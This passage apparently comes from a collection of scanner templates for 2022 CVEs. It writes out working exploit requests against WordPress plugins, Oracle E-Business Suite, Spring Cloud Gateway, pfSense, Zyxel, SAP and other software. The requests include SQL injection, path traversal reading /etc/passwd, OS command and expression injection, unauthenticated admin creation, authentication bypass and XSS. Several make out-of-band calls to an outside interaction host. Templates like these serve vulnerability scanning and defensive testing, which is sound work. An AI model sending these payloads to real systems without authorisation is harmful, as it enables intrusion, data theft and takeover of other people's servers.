/administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","len(body_2) == 0","status_code_2 == 302","contains(header_2, \"text/html\")","contains(body_1, \"webTareasSID\")"],"condition":"and"}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0228","info":{"name":"Popup Builder < 4.0.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"first name\", \"last name\", \"email\")","contains(content_type_2, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0342","info":{"name":"Zyxel - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["interface-name","saved at"],"condition":"and"},{"type":"word","part":"header","words":["text/zyxel","attachment; filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34094","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34267","info":{"name":"RWS WorldServer - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /ws-api/v2/users/me/details?token=02 HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"fullName\":\"System\""]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34093","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0899","info":{"name":"Header Footer Code Manager < 1.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(/document.domain/)</script>\")","contains(body_2, \"All Snippets\")"],"condition":"and"}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp","Total execution time is"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for 